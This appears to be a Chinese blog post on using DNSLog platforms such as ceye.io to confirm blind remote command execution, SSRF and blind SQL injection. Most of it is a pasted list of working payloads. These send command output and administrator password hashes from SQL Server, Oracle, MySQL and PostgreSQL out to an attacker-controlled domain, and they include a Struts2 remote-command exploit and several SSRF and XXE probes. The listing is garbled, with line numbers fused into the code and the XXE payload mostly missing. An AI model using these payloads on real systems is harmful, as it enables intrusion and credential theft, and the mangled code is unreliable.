mysql dnslog_DNSLOG | 利用总结

最新推荐文章于 2024-06-19 15:00:58 发布
最新推荐文章于 2024-06-19 15:00:58 发布
阅读量528 收藏
点赞数
文章标签: mysql dnslog
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42298352/article/details/113426709
版权
本文介绍了在wb在线面试中遇到的无回显RCE问题的解决方案,即使用DNSLog平台进行验证。详细列举了几个常用的DNSLog服务,如ceye.io、dnslog.cn和开源的DNSLog项目。DNSLog在缺乏回显的漏洞利用中起到关键作用,如RCE、SSRF、Blind SQL等场景。文中以ceye.io为例,展示了在不同操作系统和数据库环境下,如何构造payload进行DNSLog利用,并提供了多种payload实例。
摘要由CSDN通过智能技术生成

0x00  写这篇博客的原因是wb在线的面试中无回显rce的问题在这里填了这个坑

0x10 下面是几个常用的dnslog平台

1 http://ceye.io/

2 http://www.dnslog.cn/

3 https://github.com/BugScanTeam/DNSLog(开源可自行搭建的平台)

0x20 dnslog平台的作用

现在很多漏洞都没有办法去回显,可是我们的payload已经执行,所以我们需要使用一些第三方的dnslog平台去验证我们的漏洞的存在性。dnslog的利用方法主要涉及到以下几种漏洞的情况

1 rce2 ssrf3 blind sql4 ...

0x30 dnslog利用方式

这里通过ceyo.io为例

这里在作者windows系统下测试,发现使用ping `whoami`.1u2gcq.ceye.io这样的命令并不好使结果产生的是找不到主机。

curl http://1u2gcq.ceye.io/whoami也并没有使用回显当前用户的权限。

唯一能够行得通的命令

ping %os%.12345.ceye.io

当%%中的为系统参数可以去执行,如果是本地参数有可能也无法去执行。

下面为一些公开的payload

1 0x00Command Execution2 i. *nix:3 curl http://ip.port.b182oj.ceye.io/`whoami`

4 ping `whoami`.ip.port.b182oj.ceye.io5 ii. windows6 ping %USERNAME%.b182oj.ceye.io7 0x01SQL Injection8 i. SQL Server9 DECLARE @host varchar(1024);10 SELECT @host=(SELECT TOP 1

11 master.dbo.fn_varbintohexstr(password_hash)12 FROM sys.sql_logins WHERE name='sa')13 +'.ip.port.b182oj.ceye.io';14 EXEC('master..xp_dirtree

15 "\\'+@host+'\foobar$"');

16 ii. Oracle17 SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');18 SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;19 SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;20 SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;21 SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;22 iii. MySQL23 SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));24 iv. PostgreSQL25 DROP TABLE IF EXISTS table_output;26 CREATE TABLE table_output(content text);27 CREATE OR REPLACE FUNCTION temp_function()28 RETURNS VOID AS $29 DECLARE exec_cmd TEXT;30 DECLARE query_result TEXT;31 BEGIN32 SELECT INTO query_result (SELECT passwd33 FROM pg_shadow WHERE usename='postgres');34 exec_cmd := E'COPY table_output(content)

35 FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';36 EXECUTE exec_cmd;37 END;38 $ LANGUAGE plpgsql SECURITY DEFINER;39 SELECT temp_function();40 0x02XML Entity Injection41 <?xml version="1.0" encoding="UTF-8"?>

42 43

44 %remote;]>

45

46 0x03Others47 i. Struts248 xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}

49 xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}50 ii. FFMpeg51 #EXTM3U52 #EXT-X-MEDIA-SEQUENCE:0

53 #EXTINF:10.0,54 concat:http://ip.port.b182oj.ceye.io

55 #EXT-X-ENDLIST56 iii. Weblogic57 xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

58 iv. ImageMagick59 push graphic-context60 viewbox 0 0 640 480

61 fill 'url(http://ip.port.b182oj.ceye.io)'

62 pop graphic-context63 v. Resin64 xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf

65 vi. Discuz66 http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo

郭远航
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang 相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键构造自己的Dnslog平台。由于是作者的第一个golang程序,难免会有一些小问题。不过他真的是一键! 部署 克隆或者下载本仓库到你的服务器上 不多说。 决定是否开放公网访问? 倒数第几行中的http.ListenAndServe("localhost:8000", nil) ,这样写的话只能通过本地主机进行访问,墙裂建议不要修改,而后通过中间件反向代理后对外开放,方便做访问控制,日志管理等。如果想直接对外开放的话可以修改为: http.ListenAndServe(":8000", nil) 域名准备 做好NS指向即可。不会检查请看后文 尝试运行 ~~
好用的dnslog在线平台
热门推荐
siu~
08-21 1万+
dnslog在线平台分享
分享一个dnslog在线平台
最新发布
2301_76297780的博客
06-19 369
分享一个dnslog在线平台
DNSlog使用
weixin_48000706的博客
07-31 1301
【代码】DNSlog使用。
DNSlog
遇事不决冲冲冲
08-08 9369
什么是DNSlog DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名的访问信息,类似日志文件。 原理 payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog平台上,通过读取这些解析的日志,来获取信息。 使用方法 通过Burp Suite 通过在线平台 http://www.dnslog.cn/ http://ceye.io/ 利用场景 执行命令时没
DNSLog漏洞探测(二)之常用DNSLog平台
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 4298
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台DNSLog平台非常的多,但是实际上大部分的DNSLog平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
lib_mysqludf_sys 的win版本dll库
12-01
**标题与描述解析** "lib_mysqludf_sys 的win版本dll库"这一标题明确指出,我们正在讨论的是一个专为Windows操作...为了利用这个库,用户需要确保选择正确的DLL版本,并按照说明将其正确地集成到他们的MySQL环境之中。
lib_mysqludf_sys
12-22
总结来说,"lib_mysqludf_sys"为MySQL带来了强大的系统命令执行能力,极大地扩展了MySQL的功能边界。但同时,它也增加了潜在的安全风险,因此在使用时务必谨慎,并确保遵循最佳安全实践。通过正确地使用和管理,"lib...
mysql_monitor.zip_MySQL monitor_mysql_monitor
09-14
对于关键的MySQL状态进行了整理和总结,对于掌握MySQL的运行状况有一定的辅助作用。除此以外你也可以尝试自己写MySQLMonitor的扩展。可以针对若干MySQL服务器进行监控,通过对监控信息的切换,可以找到这些MySQL...
阿里云域名搭建DNSLOG
qq_36226141的博客
07-19 2580
阿里云域名搭建DNSLOG
mysql带回显注入,【原创】WEB安全第四章 SQL注入篇24高级注入技巧 dnslog无回显注入...
weixin_34580002的博客
03-18 138
WEB安全第四章 SQL注入篇24高级注入技巧 dnslog无回显注入1、原理DNS在解析的时候会留下日志,利用这个属性,可以读取多级域名的解析日志,来获取信息。将带有查询的语句 发起dns查询请求,通过dns请求查询到值,组合成三级域名,在ns服务器dns的日志中显示出来。无回显注入 ,一般使用布尔型盲注入和延时注入 查询数据,但是这两种查询都是很慢,dnslog查询 因为是直接显示数据,所以这...
DNSlog平台的搭建
m0_51468027的博客
07-12 5934
从0到1搭建DNSlog平台,最后拓展了实现自动化运行DNSlog平台
DNSlog平台详解
不忘初心,护天下安全!
09-21 4230
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出, 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入,如命令执行、SSRF、XXE、sql盲注、xxs盲打等。在windows和linux因具体shell指令不同,因此需要分情况讨论,但思路一致,通过在dnslog平台的查询中,插入主机指令执行后的结果,将结果数据外带。以靶场 pikachu 的时间盲注为例,输入qianli' and sleep(5)#,耗时5秒。
个人DNSLog平台搭建
ShangYaoPaiGu的博客
12-07 2282
搭建一个DNSLog平台需要准备以下:我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名 www.baidu.com 等的访问信息,类似日志文件。在服务器中输入 解压 进入目录后使用保证DNSLog平台可以在后台运行 创建新的,使用该命令后会自动进入该screen: 修改配置文件
常用的网站和在线工具
houxian1103的博客
12-08 1万+
【代码】常用的网站和在线工具。
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 2126
创新蓝队-针对DNSlog数据外带攻击的应急与预防
浅析DNSlog在渗透测试中的实战技巧
weixin_50464560的博客
09-15 1229
文章目录 前言SSRF 盲打XSS的盲打XXE的盲打SQL的盲注RCE的盲打总结 前言 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把想获得的数据外带出来。 DNS 的全称是 Domain Name System(网络名称系统),它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如 www.baidu.com,网络上的 DNS Server 会将该域名解析,并找到对应的真实 IP 如 127.0.0.1,使用户可以..
information_schema | | mysql | | performance_schema | | sys数据库的这几个是啥意思
11-14
- information_schema:存储了关于MySQL服务器中所有数据库、表、列等元数据信息的视图,可以通过查询这些视图来获取数据库的元数据信息。 - mysql:存储了MySQL服务器的用户权限信息,包括用户账号、密码、权限等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值